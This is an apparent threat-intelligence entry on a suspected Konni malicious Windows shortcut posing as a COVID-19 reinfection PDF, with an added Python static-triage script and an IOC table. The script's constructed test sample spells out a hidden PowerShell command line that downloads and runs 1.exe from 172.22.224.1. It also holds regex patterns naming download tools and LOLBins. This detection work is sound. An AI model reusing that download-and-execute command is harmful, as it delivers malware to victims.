2024-10-11 • Sakai • Malware Presumed to Have Been Created by the North Korean Hacking Group Konni - Domestic COVID-19 Reinfection Case Status.pdf.lnk (2024.10.5)
The author assesses this Windows shortcut (LNK) file as suspected Konni activity, with the caveat that the attribution is presumptive rather than official. The lure is named as a domestic COVID-19 reinfection status PDF, suggesting possible interest in medical or public-health recipients, and carries an Adobe-style icon so that it passes for a document. The LNK launches cmd.exe and a hidden PowerShell window from the 32-bit SysWOW64 directory, changes to C:\Users\Public, downloads a decoy PDF and 1.exe from hxxp://172.22.224.1:7777, then opens both files so the victim sees the expected document while the executable runs. Note that 172.22.224.1 lies in the RFC 1918 private range 172.16.0.0/12: the embedded URL is not reachable from the public Internet and would resolve only inside a network where that address is assigned, which limits its value as a network indicator.
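The traits described above (an interpreter target behind a document icon, a hidden PowerShell window, downloads into C:\Users\Public, a double extension, a private-range download host) can all be read statically from the LNK without executing it. The following is an added triage example written for this page; it is not the author's code and does not contain the real sample. It parses the MS-SHLLINK header and StringData fields, then applies the heuristics. The LNK bytes are constructed in memory by build_lnk so that the script runs offline, and the command line, file names and icon path are assumptions modelled on the summary, not values recovered from the sample.

```python
"""Static triage of a Windows .lnk (Shell Link) file of the kind described above.

Added example; not the author's code and not the real sample. The LNK is
constructed in memory (build_lnk) so the script runs offline. Field layout
follows MS-SHLLINK: ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData."""
import ipaddress
import re
import struct
from urllib.parse import urlparse

# ShellLinkHeader.LinkFlags bits that decide which optional sections follow.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised

STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

LOLBIN_RE = re.compile(r"\\(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)\.exe$", re.I)
DOC_ICON_RE = re.compile(r"acro|adobe|\.pdf|winword|excel|powerpnt|hwp", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|\bstart\s+/min\b", re.I)
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|certutil", re.I)
STAGING_RE = re.compile(r"c:\\users\\public|%public%|\\appdata\\|programdata|%temp%", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp|txt)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the five StringData fields (empty string if absent)."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # uint16 IDListSize, then the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # uint32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for key, bit in STRING_FIELDS:           # uint16 CountCharacters, then the characters
        if not flags & bit:
            fields[key] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        size = count * 2 if unicode else count
        fields[key] = data[pos:pos + size].decode("utf-16-le" if unicode else "cp1252")
        pos += size
    return fields


def _is_private_ip(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:           # hostnames are not checked here
        return False


def analyze(data: bytes, filename: str = "") -> dict:
    """Parse the LNK and return its fields, heuristic flags, URLs and private-range hosts."""
    f = parse_lnk(data)
    flags = set()
    if LOLBIN_RE.search(f["relative_path"]):
        flags.add("lolbin_target")
        if DOC_ICON_RE.search(f["icon_location"]):
            flags.add("icon_mismatch")       # document icon on an interpreter target
    if "syswow64" in f["relative_path"].lower():
        flags.add("wow64_path")              # 32-bit binary chosen on a 64-bit host
    if HIDDEN_RE.search(f["arguments"]):
        flags.add("hidden_window")
    if DOWNLOAD_RE.search(f["arguments"]):
        flags.add("downloader")
    if STAGING_RE.search(f["arguments"] + " " + f["working_dir"]):
        flags.add("world_writable_staging")
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        flags.add("minimised_window")
    if DOUBLE_EXT_RE.search(filename):
        flags.add("double_extension")
    urls = URL_RE.findall(f["arguments"])
    private = sorted({h for h in (urlparse(u).hostname for u in urls) if h and _is_private_ip(h)})
    return {"fields": f, "flags": sorted(flags), "urls": urls, "private_hosts": private}


def build_lnk(relative_path, working_dir, arguments, icon_location, show_command=1) -> bytes:
    """Assemble a minimal Unicode LNK (constructed test input, not the real sample)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR |
             HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # empty IDList: just the TerminalID

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + id_list + s(relative_path) + s(working_dir) + s(arguments) + s(icon_location)


# Constructed sample modelled on the summary (assumed command line, not the real one):
# cmd.exe from SysWOW64 starts hidden PowerShell, stages a decoy PDF and 1.exe in
# C:\Users\Public from the private-range host, then opens both.
SAMPLE_NAME = "국내코로나19재감염사례현황.pdf.lnk"
SAMPLE_ARGS = ('/c start /min powershell -WindowStyle Hidden -Command "cd C:\\Users\\Public; '
               "(New-Object Net.WebClient).DownloadFile('http://172.22.224.1:7777/decoy.pdf','decoy.pdf'); "
               "(New-Object Net.WebClient).DownloadFile('http://172.22.224.1:7777/1.exe','1.exe'); "
               'start decoy.pdf; start 1.exe"')
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\SysWOW64\cmd.exe", r"C:\Users\Public", SAMPLE_ARGS,
                       r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    result = analyze(SAMPLE_LNK, SAMPLE_NAME)
    for key in ("flags", "urls", "private_hosts"):
        print(f"{key}: {result[key]}")
```

Running analyze on a real file is `analyze(open(path, "rb").read(), os.path.basename(path))`. The private_hosts output is the check that matters for the caveat above: a download host inside 172.16.0.0/12 (or any other RFC 1918 block) cannot be blocked at the perimeter or pivoted on in passive DNS, so a hit there should push the analyst towards the file hashes and the PowerShell command line as the durable indicators.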
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 6.6.4.1 | 2024-10-08 | 2024-10-14 |
| HASH | 02cf6a1a8b6a06eaa92d3f0302a5650… | 2024-10-11 | 2024-10-11 |
| HASH | b9766b61ab05673e2945476d2cf5209… | 2024-10-11 | 2024-10-11 |
| HASH | 1f96ef9c871f24720c7c05055ad99c78 | 2024-10-11 | 2024-10-11 |
Related Reports
2024-07-25 • Sakai • Malware from the North Korean Hacking Group Konni Disguised as a Bithumb Cryptocurrency Exchange Information Update Request - Request to Confirm Project Information at the Request of the Financial Authorities.zip (2024.7.23)